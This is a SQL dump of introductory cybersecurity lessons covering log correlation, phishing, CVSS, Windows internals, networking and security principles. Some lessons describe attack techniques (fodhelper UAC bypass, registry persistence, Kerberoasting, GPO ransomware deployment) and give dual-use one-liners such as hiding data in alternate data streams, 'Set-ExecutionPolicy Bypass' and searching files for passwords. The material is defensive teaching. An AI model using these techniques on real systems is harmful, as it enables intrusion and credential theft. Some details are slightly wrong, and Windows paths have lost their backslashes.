(361, 360, '# 🔗 Correlating Events\n\nA single log is a dot. Correlation connects the dots to make a picture.\n\n## 📝 The Raw Logs (Sequence)\n\n```text\n[09:00:01] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:02] Failed Login (User: Bob, IP: 10.0.0.50)\n[09:00:03] Failed Login (User: Bob, IP: 10.0.0.50)\n... (50 more times)\n[09:01:00] Successful Login (User: Bob, IP: 10.0.0.50)\n[09:01:05] User Created (User: Admin2, By: Bob)\n```\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Brute Force\n* The first block is a classic brute force attack.\n\n### Step 2: The Breakthrough\n* `[09:01:00]`: The attack succeeded. They guessed the password.\n\n### Step 3: Persistence\n* `[09:01:05]`: The very first thing the attacker did was create a BACKDOOR user (`Admin2`).\n* **Why**: Even if Bob changes his password, the attacker can still login as Admin2.\n\n### Step 4: The Correlation Rule\n* `Trigger Alert IF (Failed_Login > 10 in 5 mins) FOLLOWED BY (Successful_Login)`.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(368, 367, '# 🎣 Phishing Types\n\n## 📝 The Scenario\n**Email 1**: \"Dear Customer, your Netflix is expired. Click here.\"\n**Email 2**: \"Hi Bob, I enjoyed our meeting about Project X in London. Please review the attached contract.\"\n\n## 🕵️‍♂️ Investigation Steps\n\n### Analysis of Email 1 (Bulk Phishing)\n* **Greeting**: Generic (\"Dear Customer\").\n* **Urgency**: High (\"Expired\").\n* **Targeting**: None. Sent to millions.\n\n### Analysis of Email 2 (Spear Phishing)\n* **Greeting**: Personalized (\"Hi Bob\").\n* **Context**: specific (\"Project X\", \"London\").\n* **Source**: The attacker likely researched Bob on LinkedIn.\n* **Danger**: Extremely high. Users trust context.\n\n### 🛡️ Defense\nFor Spear Phishing, you rely on **User Awareness Training**. Technology often misses the context, but a human might spot that \"Project X\" was cancelled last week.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(369, 368, '# 🔗 URL Analysis\n\n## 📝 The Raw Link\n`http://www.paypal.com.secure-login-updates.xyz/login.php`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: The Root Domain\n* **Reading**: Read from Right to Left.\n* **TLD**: `.xyz` (Cheap, often malicious).\n* **Domain**: `secure-login-updates.xyz`.\n* **Subdomains**: `www.paypal.com`.\n\n### Step 2: Homoglyphs\n* Look closely at: `pаypal.com`.\n* The \'a\' might be a Cyrillic character (IDN Homograph Attack). Use a \"Punycode Converter\" to check.\n* Real: `paypal.com`.\n* Fake: `xn--pypal-4ve.com`.\n\n### Step 3: Sandboxing\n* Paste the URL into **UrlScan.io**.\n* Look at the screenshot. Does it look like the real PayPal login page?\n* If yes, it is a credential harvester.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(370, 369, '# 💯 CVSS Scoring System\n\nUnderstanding the Common Vulnerability Scoring System (v3.1).\n\n## 📝 The Raw Vector\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`\n\n## 🕵️‍♂️ Investigation Steps\n\n### Step 1: Attack Vector (AV)\n* **AV:N (Network)**: The vulnerability can be exploited remotely over the internet. (BAD)\n* **AV:P (Physical)**: You need to touch the device (USB). (Less critical).\n\n### Step 2: Complexity & Privileges\n* **AC:L (Low Complexity)**: A script kiddie can do it.\n* **PR:N (None)**: No login required.\n* **UI:N (None)**: No user interaction required.\n\n### Step 3: CIA Impact\n* **C:H (Confidentiality High)**: They steal all data.\n* **I:H (Integrity High)**: They change all data.\n* **A:H (Availability High)**: They delete everything.\n\n### Score\n* **9.8 CRITICAL**. Drop everything and patch this.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(371, 370, '# 🏥 Prioritizing Patches\n\nYou have 10,000 vulnerabilities. You can patch 50. Which ones?\n\n## 📝 The Scenario\n1. **Server A**: Internal Test Server. Vulnerability: Score 10.0 (RCE).\n2. **Server B**: External Web Server. Vulnerability: Score 7.5 (SQLi).\n\n## 🕵️‍♂️ Decision Steps\n\n### Step 1: Exposure\n* **Server B** is reachable from the internet. Attackers are scanning it 24/7.\n* **Server A** is behind a firewall. Attackers need to be inside first.\n\n### Step 2: Exploitability\n* Is there a Metasploit module for the SQLi? Yes.\n* Is the RCE theoretical? Yes.\n\n### Step 3: Business Impact\n* If Web Server goes down, we lose money.\n* If Test Server goes down, devs preserve coffee.\n\n### 🏆 Verdict\n**Patch Server B first**. Context matters more than raw score.\n', 'markdown', NULL, '2025-12-26 17:59:31', '2025-12-26 18:05:37'),
(391, 32, '## Windows File System\n\nUnlike Linux (start at `/`), Windows starts at a Drive Letter, usually `C:`.\n\n### Key Directories\n1.  `C:Windows`: The OS core.\n    *   `System32`: Critical DLLs and Executables. (Note: On 64-bit systems, System32 contains 64-bit files. `SysWOW64` contains 32-bit files. Confusing, but legacy.)\n2.  `C:Users`: User profiles.\n    *   `C:UsersBobDesktop`, `Downloads`, etc.\n    *   `AppData`: Hidden folder storing app settings (Chrome history, Discord cache). Great for forensics.\n3.  `C:Program Files`: Where 64-bit apps live.\n4.  `C:Program Files (x86)`: Where 32-bit apps live.\n5.  `C:PerfLogs`: Performance logs. Often empty, but sometimes writable by everyone (PrivEsc vector!).\n\n### ADS (Alternate Data Streams)\nA hidden feature of NTFS. A file can have \"sub-files\" hidden behind it.\n*   `echo \"Hidden Data\" > innocent.txt:secret.txt`\n*   `innocent.txt` looks normal. 0 bytes change.\n*   Hackers use ADS to hide malware inside benign files.\n*   **Detection**: `dir /R` shows streams.\n\n### Permissions (ICACLS)\nWindows uses ACLs (Access Control Lists).\n*   **Full Control**: God mode.\n*   **Modify**: Read/Write/Delete.\n*   **Read & Execute**: Run programs.\n*   **tool**: `icacls file.txt` (View permissions).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(392, 33, '## User Account Control (UAC)\n\nIntroduced in Vista, UAC is the \"Dimmed Screen\" popup asking \"Do you want to allow this app to make changes?\".\n\n### The Concept\nEven if you are an Administrator, you run with \"Standard\" tokens most of the time. When you need to do a privileged action (like installing software), UAC pauses and asks for the \"Administrator\" token.\n*   **Integrity Levels**:\n    *   **System**: Kernel level. Highest.\n    *   **High**: Administrators (Elevated).\n    *   **Medium**: Standard Users (and Admin non-elevated).\n    *   **Low**: Sandboxed apps (Browser tabs).\n\n### UAC Bypass\nA common hacking technique. Malware tries to assume the High Integrity token without triggering the popup.\n*   **Fodhelper Exploit**: A built-in Windows binary that auto-elevates. Malware hijacks its registry keys to execute code as Admin silently.\n\n### Security Boundaries\nMicrosoft says UAC is **not** a security boundary. It is a convenience feature. If you are already Admin, UAC won\'t stop a sophisticated script.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(393, 34, '## The Windows Registry\n\nThe Registry is a massive hierarchical database storing ALL configuration settings.\n*   Tool: `regedit.exe`.\n\n### The 5 Hives (Root Keys)\n1.  **HKLM (HKEY_LOCAL_MACHINE)**: Settings for the computer (regardless of who is logged in).\n    *   `HKLMSoftware`: Installed programs.\n    *   `HKLMSystem`: Drivers, Services, Boot config.\n2.  **HKCU (HKEY_CURRENT_USER)**: Settings for YOU.\n    *   Wallpaper, theme, saved passwords.\n    *   Actually points to `HKUSID`.\n3.  **HKCR (Classes Root)**: File associations (open .pdf with Acrobat).\n4.  **HKU (Users)**: Stores profiles for all users.\n5.  **HKCC (Current Config)**: Hardware profile.\n\n### Persistence in Registry\nHackers love the registry because you can tell Windows to run malware at boot.\n*   **Run Keys**: `HKLMSoftwareMicrosoftWindowsCurrentVersionRun`. Anything here starts when ANY user logs in.\n*   **RunOnce**: Starts once then deletes itself.\n*   **Services**: `HKLMSystemCurrentControlSetServices`.\n\n### Forensics Value\n*   **ShimCache / AmCache**: Evidence of program execution (even if deleted).\n*   **shellbags**: Evidence of which folders were opened.\n*   **USBSTOR**: History of every USB drive ever plugged in.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(394, 35, '## Active Directory (AD)\n\nIf you work in a corporate environment, you use AD. It allows centralized management of users and computers.\n*   **Domain Controller (DC)**: The server running AD (usually Windows Server). It holds the database (`ntds.dit`).\n\n### Core Concepts\n1.  **Domain**: A security boundary. e.g., `corp.local`.\n2.  **Object**: Anything in the domain (User, Computer, Printer, Group).\n3.  **OU (Organizational Unit)**: Folders to organize objects (Sales, HR, IT). You apply policies (GPO) to OUs.\n4.  **Forest**: A collection of Domain Trees. The top level container.\n\n### Authentication: Kerberos vs NTLM\n*   **NTLM**: The old, challenge-response protocol. Vulnerable to \"Pass the Hash\".\n*   **Kerberos**: The standard. Uses \"Tickets\".\n    *   **TGT (Ticket Granting Ticket)**: Proof you are essentially authenticated.\n    *   **TGS (Ticket Granting Service)**: Proof you can access a specific service (like a File Share).\n    *   **Attacks**: Golden Ticket (Forging TGTs), Kerberoasting (Stealing Service Account hashes).\n\n### BloodHound\nA tool used by both Red and Blue teams to visualize AD relationships. It finds \"Attack Paths\" (e.g., User A is Admin on Computer B, where Admin C is logged in...).', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(395, 36, '## PowerShell\n\nThe most powerful tool in Windows. It is an Object-Oriented shell.\n(`cmd.exe` is text-based. `powershell.exe` handles Objects).\n\n### Cmdlets (Command-lets)\nThey follow `Verb-Noun` syntax.\n*   `Get-Process`: List processes.\n*   `Stop-Service`: Stop a service.\n*   `New-Item`: Create a file.\n\n### Aliases\nShortcuts for Linux users.\n*   `ls` -> `Get-ChildItem`\n*   `cat` -> `Get-Content`\n*   `wget` -> `Invoke-WebRequest`\n\n### The Pipeline `|`\nPasses objects.\n*   `Get-Process | Sort-Object CPU -Descending | Select-Object -First 5`\n    *   Get all processes.\n    *   Sort them by CPU usage.\n    *   Show only top 5.\n\n### PowerShell for Hackers\n*   **Fileless Malware**: Running a script strictly in memory (RAM). No file touches the disk, so Antivirus often misses it.\n*   **Execution Policy**: A safety feature, not security.\n    *   `Set-ExecutionPolicy Bypass`: Ignores the restrictions.\n*   **Logging**: Script Block Logging (Event 4104) is the only way to catch malicious PowerShell.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(396, 37, '## Windows Event Logs\n\nThe \"Black Box\" of Windows. Stored in `.evtx` format.\nViewer: `Event Viewer` (`eventvwr.msc`).\n\n### Main Logs\n1.  **Security**: Logins, Privilege use. (Most important for us).\n2.  **System**: Drivers, Service crashes, Reboot.\n3.  **Application**: App crashes (SQL Server logs, etc).\n\n### Critical Event IDs to Memorize\nIf you are a SOC Analyst, tattoo these on your arm.\n\n*   **4624**: Successful Logon.\n    *   Look at **Logon Type**:\n        *   Type 2: Interactive (Keyboard/Local).\n        *   Type 3: Network (SMB/Shared Folder).\n        *   Type 10: RDP (Remote Desktop).\n*   **4625**: Failed Logon. (Brute force indicator).\n*   **4720**: User Created. (Did a hacker add a backdoor user?).\n*   **4672**: Special Privileges Assigned. (Admin logon).\n*   **1102**: Audit Log Cleared. (Hacker trying to cover tracks. HUGE RED FLAG).\n*   **7045**: Service Installed (System Log). (Persistence mechanism).\n\n### Sysmon (System Monitor)\nDefault Windows logs are okay. **Sysmon** (from Sysinternals) is amazing. It logs process creation, network connections, and DNS Lookups.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(397, 38, '## Group Policy (GPO)\n\nGroup Policy Objects allows Admins to push settings to thousands of computers at once.\n*   \"Disable Control Panel for all HR employees.\"\n*   \"Set the wallpaper to company logo.\"\n*   \"Install Chrome on all computers.\"\n\n### Structure\n*   **Computer Configuration**: Applies to the machine (starts at boot).\n*   **User Configuration**: Applies to the user (starts at login).\n\n### The Refresh\nGPO is not instant.\n*   `gpupdate /force`: Command to force a sync with the DC.\n*   Refreshes every 90 minutes by default.\n\n### Abuse\nIf a hacker compromises a Domain Admin account, they can create a malicious GPO to deploy Ransomware to every PC in the company instantly. This is how massive breaches happen.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(398, 39, '## Windows Security Tools\n\nBuilt-in and Sysinternals tools you should know.\n\n### Native Tools\n*   **Task Manager**: Identify resource hogs.\n*   **Resource Monitor**: Detailed network/disk view.\n*   **Windows Defender Firewall**: Controls Inbound/Outbound traffic.\n*   **BitLocker**: Full Disk Encryption. Protects data if laptop is stolen.\n\n### Sysinternals Suite\nA set of free tools active maintained by Mark Russinovich (Azure CTO).\n1.  **Process Explorer**: \"Task Manager on steroids\". Shows DLLs loaded, handles open, and verify file signatures (detect malware pretending to be Microsoft).\n2.  **Process Monitor (ProcMon)**: Real-time logs of File System, Registry, and Network activity.\n    *   *Use*: Run malware, watch ProcMon to see what files it creates.\n3.  **Autoruns**: Shows EVERYTHING that starts at boot. (Registry run keys, Scheduled Tasks, Services, Drivers). Best tool for finding persistence.\n4.  **TCPView**: Real-time view of open ports and connections.', 'markdown', 7, '2025-12-26 20:49:49', '2025-12-29 13:59:51'),
(416, 22, '## The OSI Model\n\nThe **Open Systems Interconnection** model describes how data moves from one computer to another. It has 7 Layers.\n\"**P**lease **D**o **N**ot **T**hrow **S**ausage **P**izza **A**way\"\n\n### The Layers (Bottom Up)\n1.  **Physical (Layer 1)**: The cables, fiber optics, and radio waves (WiFi). Bits (0s and 1s).\n    *   *Device*: Hub, Cable.\n    *   *Attack*: Wiretapping, Jamming.\n2.  **Data Link (Layer 2)**: MAC Addresses (Physical usage). Switches operate here.\n    *   *Unit*: Frame.\n    *   *Attack*: ARP Spoofing.\n3.  **Network (Layer 3)**: IP Addresses (Logical usage). Routers operate here.\n    *   *Unit*: Packet.\n    *   *Attack*: Ping Flood.\n4.  **Transport (Layer 4)**: TCP/UDP. Ports. Reliability.\n    *   *Unit*: Segment.\n    *   *Attack*: SYN Flood (DoS).\n5.  **Session (Layer 5)**: Establishing and ending connections (Sessions).\n6.  **Presentation (Layer 6)**: Encryption (SSL/TLS) and formatting (JPEG/ASCII).\n7.  **Application (Layer 7)**: The software you use (HTTP, DNS, SMTP).\n\n### Interaction\nWhen you click a link:\n*   **Encapsulation**: Data goes DOWN the stack (L7 -> L1) adding headers at each layer.\n*   **Decapsulation**: Data goes UP the stack (L1 -> L7) stripping headers.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(417, 23, '## TCP/IP Protocol Suite\n\nThe ISO model is theoretical. TCP/IP is what we actually use.\n\n### TCP (Transmission Control Protocol)\n**Connection-Oriented**. \"Reliable\".\n1.  **The 3-Way Handshake**:\n    *   **SYN** (Client): \"Hi, can we talk?\"\n    *   **SYN-ACK** (Server): \"Yes, I am open.\"\n    *   **ACK** (Client): \"Great, here is data.\"\n2.  **Guarantees Delivery**: If a packet is lost, TCP resends it.\n3.  **Use Case**: Web browsing (HTTP), Email (SMTP), File Transfer (FTP). You don\'t want a missing pixel in your file.\n\n### UDP (User Datagram Protocol)\n**Connection-less**. \"Fire and Forget\".\n1.  No Handshake. No Guarantee.\n2.  The sender just blasts data. If you miss it, tough luck.\n3.  **Use Case**: Streaming Video, VoIP (Voice), DNS.\n    *   *Why?* Speed. If you drop a frame in a video, you don\'t want to pause and wait for it to resend. You just move to the next frame.\n\n### Headers\n*   **TCP Header**: Source Port, Dest Port, Sequence Number, Flags (SYN/ACK/FIN/RST).\n*   **IP Header**: Source IP, Dest IP, TTL (Time To Live).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(418, 24, '## IP Addressing\n\nEvery device needs an IP.\n*   **IPv4**: 32-bit. `192.168.1.1`. (Running out).\n*   **IPv6**: 128-bit. `2001:db8::1`. (The future).\n\n### IPv4 Classes\n*   **Class A**: `1.0.0.0` to `126.x.x.x` (Huge networks).\n*   **Class B**: `128.0.0.0` to `191.x.x.x` (Universities).\n*   **Class C**: `192.0.0.0` to `223.x.x.x` (Small networks).\n\n### Private IPs (RFC 1918)\nThese IPs do not route on the internet. Used for LANs.\n*   `10.0.0.0` - `10.255.255.255`\n*   `172.16.0.0` - `172.31.255.255`\n*   `192.168.0.0` - `192.168.255.255`\n*   **Loopback**: `127.0.0.1` (Localhost).\n\n### Subnetting (CIDR)\nSplitting a network into smaller chunks.\n*   `/24` (Subnet Mask `255.255.255.0`):\n    *   First 3 octets match (`192.168.1.x`).\n    *   Only the last octet changes.\n    *   **Hosts**: 254 usable IPs (`1-254`).\n*   `/16` (Mask `255.255.0.0`):\n    *   **Hosts**: 65,534.\n*   `/32`: A single IP.\n\n**Calculation**:\nNumber of IPs = $2^{(32 - CIDR)}$.\n*   `/30` = $2^2$ = 4 IPs. (Minus Network and Broadcast = 2 usable). Used for Router-to-Router links.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(419, 25, '## Subnetting Cheat Sheet\n\nCalculating subnets is a core skill for certifications (Network+, CCNA).\n\n### The Magic Number Method\nFind the \"Interesting Octet\" (The one where the mask is not 0 or 255).\n\n**Scenario**: Network `192.168.10.0 /26`.\n1.  **Prefix**: /26.\n2.  **Octet**: 26 is in the 4th octet (24 + 2).\n3.  **Mask**: /26 means `11000000` in binary.\n    *   `128 + 64 = 192`. So Mask is `255.255.255.192`.\n4.  **Block Size**: 256 - Mask (192) = **64**.\n\nThis means networks jump by 64.\n*   Subnet 1: `192.168.10.0` - `192.168.10.63`\n*   Subnet 2: `192.168.10.64` - `192.168.10.127`\n*   Subnet 3: `192.168.10.128` - `192.168.10.191`\n*   Subnet 4: `192.168.10.192` - `192.168.10.255`\n\n### Usable Hosts\nFormula: `Block Size - 2`.\n*   Take Subnet 1: Range 0-63.\n*   **0** is Network Address.\n*   **63** is Broadcast Address.\n*   **Usable**: 1-62.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(420, 26, '## DNS (Domain Name System)\n\nDNS turns human names (`google.com`) into computer IPs (`142.250.72.14`).\n\n### The DNS Hierarchy\n1.  **Root Hints (.)**: The 13 root servers worldwide. They know who handles `.com`, `.org`, etc.\n2.  **TLD (Top Level Domain)**: The `.com` servers. They know who handles `google.com`.\n3.  **Authoritative Name Server**: Google\'s actual server. It knows the IP.\n\n### The Resolution Process\nYou type `google.com`.\n1.  **PC**: Checks local cache / HOSTS file.\n2.  **Recursive Resolver (ISP/8.8.8.8)**: \"I don\'t know. I\'ll ask Root.\"\n3.  **Root**: \"I don\'t know, ask .COM server.\"\n4.  **.COM**: \"I don\'t know, ask ns1.google.com.\"\n5.  **ns1.google.com**: \"I know! It is 1.2.3.4.\"\n6.  **Resolver**: Caches it and gives it to PC.\n\n### Record Types\n*   **A**: IPv4.\n*   **AAAA**: IPv6.\n*   **MX**: Mail Server.\n*   **CNAME**: Alias.\n*   **PTR**: Reverse DNS (IP -> Name). Used for email filtering.\n*   **TXT**: Arbitrary text (SPF/DMARC).', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(421, 27, '## DHCP and ARP\n\nHow you join a network.\n\n### DHCP (Dynamic Host Configuration Protocol)\nAutomates assigning IPs.\n**The DORA Process**:\n1.  **Discover**: Client shouts (Broadcast): \"IS ANY DHCP SERVER HERE?\"\n2.  **Offer**: Server says: \"I can give you IP `192.168.1.100`\".\n3.  **Request**: Client says: \"I will take it!\"\n4.  **Acknowledge**: Server says: \"It yours for 24 hours.\"\n\n### ARP (Address Resolution Protocol)\nMaps IP (Logic) to MAC (Physical).\n*   Switch knows MACs. Router knows IPs.\n*   When you ping `192.168.1.5` on a LAN:\n    1.  PC checks ARP Table: \"Do I know the MAC for 192.168.1.5?\"\n    2.  If No: Broadcast \"WHO HAS 192.168.1.5? TELL 192.168.1.2\".\n    3.  Device replies \"I have it! My MAC is AA:BB:CC...\".\n    4.  PC sends frame to AA:BB:CC.\n\n**ARP Spoofing (Man in the Middle)**:\nHacker replies \"I am 192.168.1.5!\" to the PC, and \"I am the Router!\" to the Gateway. Now all traffic flows through the Hacker.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(422, 28, '## Common Protocols & Ports\n\nMemorize these.\n\n| Port | Protocol | Service | Secure? |\n|---|---|---|---|\n| **20/21** | FTP | File Transfer | No (Cleartext) |\n| **22** | SSH | Secure Shell (Remote Linux) | **Yes** |\n| **23** | Telnet | Telemetry (Remote CLI) | No (Cleartext) |\n| **25** | SMTP | Email Sending | No (Use 587) |\n| **53** | DNS | Domain Name System | No (DNSSEC exists) |\n| **80** | HTTP | Web Traffic | No |\n| **443** | HTTPS | Encrypted Web Traffic | **Yes** (TLS) |\n| **110** | POP3 | Email Retrieval | No |\n| **143** | IMAP | Email Retrieval | No |\n| **3389** | RDP | Remote Desktop (Windows) | Yes |\n| **445** | SMB | Windows File Share | No (v1/v2 vulnerable) |\n\n### Traffic Analysis\n*   **Cleartext** protocols (HTTP, Telnet, FTP) show passwords in Wireshark.\n*   **Encrypted** protocols (HTTPS, SSH) show garbage characters.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-29 14:00:46'),
(424, 30, '# Scenario: The Suspicious Login\n\n**Background**: You are a SOC Analyst. You received an alert about \"Cleartext Credentials\" on the network. You open the PCAP file in Wireshark.\n\n## Investigation Data\n*   **Packet 12**: Protocol: HTTP. Source: 192.168.1.105. Dest: 104.21.55.2.\n*   **Info**: POST /login.php HTTP/1.1\n*   **Packet 12 Details**:\n    *   Form item: \"username\" = \"admin\"\n    *   Form item: \"password\" = \"SuperSecret123\"\n\n## Analysis\n1.  The user logged into a website using **HTTP**, not HTTPS.\n2.  Because it was HTTP, the data was sent in **Plaintext**.\n3.  Anyone on the same WiFi could have captured this packet and stolen the credentials.\n\n## Mitigation\n*   Always enforce **HTTPS** (TLS/SSL).\n*   Use certificate pinning.\n*   Educate users to look for the \"Padlock\" icon.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'),
(425, 31, '# Final Module Quiz\n\nReview the key concepts from this module:\n*   OSI Layers & TCP/IP\n*   IP Addressing & Subnets\n*   Common Protocols (SSH, HTTP, DNS)\n*   Packet Analysis Basics\n\nYou are now ready to tackle real-world networking scenarios.', 'markdown', 10, '2025-12-26 20:53:36', '2025-12-26 20:53:36'),
(434, 40, '## The CIA Triad\n\nThe cornerstone of Information Security. Every decision balances these three.\n\n1.  **Confidentiality**: Keeping secrets secret.\n    *   **Goal**: Only authorized people can read data.\n    *   **Tools**: Encryption (AES), Access Control Lists (ACLs), Steganography.\n    *   **Failure**: Data Breach (Equifax).\n2.  **Integrity**: Trusting the data.\n    *   **Goal**: Data has not been tampered with.\n    *   **Tools**: Hashing (SHA256), Digital Signatures.\n    *   **Failure**: An attacker changing a bank transfer from $10 to $10,000.\n3.  **Availability**: Accessing the data.\n    *   **Goal**: Systems are up and running.\n    *   **Tools**: Redundancy (RAID), Backups, Load Balancers.\n    *   **Failure**: DDOS Attack, Ransomware (Encrypting files makes them unavailable).\n\n### The Balancing Act\nYou cannot have 100% of all three.\n*   To make a system perfectly Confidential (unplug internet), you hurt Availability.\n*   To make it perfectly Available (Open wifi), you hurt Confidentiality.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(435, 41, '## Authentication (AuthN)\n\n\"Who are you?\"\n\n### The Three Factors\n1.  **Type 1: Something you Know**: Password, PIN, Mother\'s Maiden Name.\n    *   *Weakness*: Can be guessed or phished.\n2.  **Type 2: Something you Have**: Smart Card, Phone (SMS Code), YubiKey.\n    *   *Weakness*: Can be stolen or lost.\n3.  **Type 3: Something you Are**: Biometrics (Fingerprint, Retina, FaceID).\n    *   *Weakness*: Privacy concerns. You can\'t reset your face if it is compromised.\n\n### MFA (Multi-Factor Authentication)\nCombining two *different* factors.\n*   Password + PIN = **NOT MFA** (Both are Type 1).\n*   Password + SMS Code = **MFA** (Type 1 + Type 2).\n*   **Impact**: MFA stops 99.9% of automated account takeovers.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(436, 42, '## Authorization (AuthZ)\n\n\"What are you allowed to do?\"\n(AuthN happens first, then AuthZ).\n\n### Models\n1.  **DAC (Discretionary Access Control)**:\n    *   The owner decides. (Windows/Linux file permissions).\n    *   \"I created this file, I let Bob read it.\"\n2.  **MAC (Mandatory Access Control)**:\n    *   The System decides based on labels. (Military).\n    *   \"User is SECRET. File is TOP SECRET. User cannot read.\"\n3.  **RBAC (Role Based Access Control)**:\n    *   Access based on job function. (Corporate).\n    *   \"Bob is in HR Group. HR Group can read Payroll.\" (Best for scaling).\n4.  **ABAC (Attribute Based)**:\n    *   \"User can read file IF location=Office AND time=9am-5pm.\" (Zero Trust).', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(437, 43, '## Accounting (Non-Repudiation)\n\n\"What did you do?\"\nTracking user actions to ensure accountability.\n\n### Logging\n*   **Who**: user `jsmith`.\n*   **What**: Accessed `salary_database.db`.\n*   **When**: `2024-12-25 04:00:00`.\n*   **Where**: From IP `10.5.5.5`.\n\n### Non-Repudiation\nProof that someone did something so they cannot deny it later.\n*   **Digital Signatures**: If I sign an email with my Private Key, I cannot claim \"I didn\'t write that\", because only I have the key.\n*   **Audit Trails**: Logs sent to a central SIEM that users cannot delete.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(438, 44, '## Encryption Basics\n\nTurning \"Plaintext\" into \"Ciphertext\".\n\n### Symmetric Encryption (Shared Key)\n*   **Concept**: Same key locks and unlocks.\n*   **Algorithms**: AES (Advanced Encryption Standard), DES (Legacy), 3DES.\n*   **Pros**: Fast. Good for large data (Hard Drives, Zip files).\n*   **Cons**: Key Distribution problem. How do I send you the key securely?\n\n### Asymmetric Encryption (Public Key)\n*   **Concept**: Key Pair.\n    *   **Public Key**: You give to everyone. Encrypts data.\n    *   **Private Key**: You accept. Decrypts data.\n*   **Algorithms**: RSA, ECC (Elliptic Curve).\n*   **Pros**: Secure key exchange.\n*   **Cons**: Slow. CPU intensive.\n\n### Hybrid Encryption (HTTPS/TLS)\nWe use Asymmetric to exchange the key, then Symmetric to transfer the data. best of both worlds.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(439, 45, '## Hashing vs Encryption\n\nThey are often confused but are opposite concepts.\n\n| Feature | Encryption | Hashing |\n|---|---|---|\n| **Reversible?** | **YES** (with key). | **NO** (One-way). |\n| **Purpose** | Confidentiality. | Integrity. |\n| **Output Size** | Variable (Depends on input). | Fixed (e.g., 256 bits). |\n| **Examples** | AES, RSA. | SHA-256, MD5. |\n\n### Hashing Use Cases\n1.  **Password Storage**: Never save passwords as text. Save the hash. When user logs in, hash their input and compare it to the database.\n2.  **File Integrity**: Download a file. Check its MD5. If it matches the website, the file involves no corruption or malware injection.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(440, 46, '## Defense in Depth (Layered Security)\n\nDo not rely on one wall. If the wall fails, you lose. Use multiple layers.\nThe \"Onion\" approach.\n\n### The Layers\n1.  **Policies/User**: Training, Strong Passwords.\n2.  **Physical**: Locks, Cameras, Guards.\n3.  **Perimeter**: Firewall, DMZ.\n4.  **Network**: VLANs, NAC (Network Access Control).\n5.  **Host**: Antivirus, EDR, Patching.\n6.  **Application**: Secure Code, Input Validation.\n7.  **Data**: Encryption, ACLs.\n\n### Example\nA hacker wants your database.\n1.  **Firewall** blocks their port scan. (Layer 3).\n2.  They Phish a user. **Email Filter** misses it.\n3.  User clicks link. **EDR** detects the malware download and blocks it. (Layer 5).\n**Defense in Depth worked**.', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-29 14:01:57'),
(441, 47, '# Final Module Quiz\n\nProve your mastery of Security Principles.\nTopics:\n*   CIA Triad (Confidentiality, Integrity, Availability)\n*   AAA (AuthN, AuthZ, Accounting)\n*   Encryption & Hashing\n*   Defense in Depth\n\nGood luck!', 'markdown', 10, '2025-12-26 20:58:02', '2025-12-26 20:58:02'),
(447, 48, '## Windows CLI Navigation\n\nThe Command Prompt (`cmd.exe`) is the legacy shell, but still essential.\n\n### Directories\n*   `dir`: List files (Like `ls` in Linux).\n*   `cd`: Change directory.\n    *   `cd Desktop`\n    *   `cd ..` (Up one level).\n    *   `cd ` (Back to C: root).\n*   `d:`: Switch to D drive. (Just type the letter).\n\n### Files\n*   `type file.txt`: Read a file (Like `cat`).\n*   `del file.txt`: Delete.\n*   `copy file.txt backup.txt`: Copy.\n*   `move file.txt folder`: Move.\n*   `ren file.txt new.txt`: Rename.\n\n### Tips\n*   **Tab Completion**: Type `cd Des` and hit Tab.\n*   **cls**: Clear screen.\n*   **help [command]**: `help dir`.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
(448, 49, '## Advanced File Reading\n\n### Searching\n*   `findstr`: The Windows grep.\n    *   `findstr \"password\" config.txt`: Search for string.\n    *   `findstr /S /I \"password\" *.txt`: Recursive (/S) and Case-Insensitive (/I) search in all text files.\n\n### Redirection\n*   `>`: Overwrite. `echo hello > file.txt`.\n*   `>>`: Append. `echo world >> file.txt`.\n*   `|`: Pipe. `type log.txt | findstr \"error\"`.\n\n### Attributes\nFiles can be Hidden.\n*   `attrib`: Show attributes.\n*   `attrib +h file.txt`: Hide it.\n*   `attrib -h file.txt`: Unhide it.', 'markdown', 5, '2025-12-26 21:05:12', '2025-12-29 14:01:57'),
